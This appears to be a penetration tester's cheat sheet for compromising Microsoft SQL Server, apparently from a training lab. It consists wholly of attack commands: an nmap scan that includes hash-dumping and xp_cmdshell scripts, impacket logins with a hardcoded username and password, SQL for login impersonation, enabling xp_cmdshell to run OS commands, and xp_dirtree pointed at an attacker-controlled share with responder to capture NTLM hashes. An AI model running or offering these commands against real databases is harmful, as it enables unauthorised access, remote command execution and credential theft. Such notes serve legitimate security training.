# Footprinting Nmap MSSQL Script Scan ```bash sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248 ``` Connecting with Mssqlclient.py ```bash python3 mssqlclient.py [email protected] -windows-auth impacket-mssqlclient <domain>/<username>:<password>@<domain> -windows-auth impacket-mssqlclient 'hokkaido-aerospace.com/discovery':'Start123!'@$IP -windows-auth ``` # Commands ```sql select * from sys.databses; - select name from sys.databases; - select name from master..sysdatabases; use <DB>; select * from sys.tables; - select name from sys.tables; select * from <table>; SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = <TABLE>; --- # enumerate db enum_db # select db use <db> # Check impersonate SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' # LOGIN as impersonate EXECUTE AS LOGIN = 'hrappdb-reader' # Enum tables SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES; ``` ```sql xp_cmdshell whoami enable_xp_cmdshell xp_dirtree \\<attacker-IP>\fake\share + sudo responder -I tun0 ```